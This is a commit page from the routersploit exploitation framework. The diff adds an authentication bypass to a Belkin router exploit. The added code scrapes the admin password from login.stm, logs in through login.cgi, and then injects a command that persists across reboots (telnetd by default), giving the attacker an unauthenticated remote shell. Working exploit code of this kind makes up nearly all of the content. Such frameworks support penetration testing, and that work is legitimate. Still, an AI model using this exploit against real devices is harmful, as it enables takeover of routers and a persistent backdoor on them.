Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
91222529
Commit
91222529
authored
8 years ago
by
BigNerd95
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Included auth bypass
parent
6b4360f9
master
…
v3.4.4
v3.4.3
v3.4.2
v3.4.0
v3.3.0
v3.2.0
v3.1.0
v3.0.0
No related merge requests found
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
44 additions
and
3 deletions
+44
-3
play_max_prce.py
routersploit/modules/exploits/belkin/play_max_prce.py
+44
-3
No files found.
routersploit/modules/exploits/belkin/play_max_prce.py
View file @
91222529
...
...
@@ -15,7 +15,6 @@ class Exploit(exploits.Exploit):
"""
Persistent remote command execution.
If the target is vulnerable, you can run a bash command at every boot.
You must be logged in to run this exploit, you can use auth_bypass exploit to log in.
"""
__info__
=
{
'name'
:
'Belkin Persistent Remote Command Execution'
,
...
...
@@ -36,8 +35,46 @@ class Exploit(exploits.Exploit):
port
=
exploits
.
Option
(
80
,
'Target Port'
)
cmd
=
exploits
.
Option
(
'telnetd'
,
'Command to execute'
)
def
run
(
self
):
def
check_auth_bypass
(
self
):
url
=
"{}:{}/login.stm"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
None
:
return
False
# target is not vulnerable
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
return
True
# target vulnerable
return
False
# target is not vulnerable
def
auth_bypass
(
self
):
url
=
"{}:{}/login.stm"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
None
:
return
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
url
=
"{}:{}/login.cgi"
.
format
(
self
.
target
,
self
.
port
)
payload
=
"pws="
+
val
[
0
]
+
"&arc_action=login&action=Submit"
login
=
http_request
(
method
=
"POST"
,
url
=
url
,
data
=
payload
)
if
login
is
None
:
return
error
=
re
.
search
(
'loginpserr.stm'
,
login
.
text
)
if
not
error
:
print_success
(
"Exploit success, you are now logged in!"
)
return
print_error
(
"Exploit failed. Device seems to be not vulnerable."
)
def
inject_command
(
self
):
ssid_url
=
"{}:{}/wireless_id.stm"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
ssid_url
)
if
response
is
None
:
...
...
@@ -71,6 +108,10 @@ class Exploit(exploits.Exploit):
print_error
(
"Exploit failed. Device seems to be not vulnerable."
)
exit
(
1
)
def
run
(
self
):
self
.
auth_bypass
()
self
.
inject_command
()
@mute
def
check
(
self
):
return
None
return
self
.
check_auth_bypass
()
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment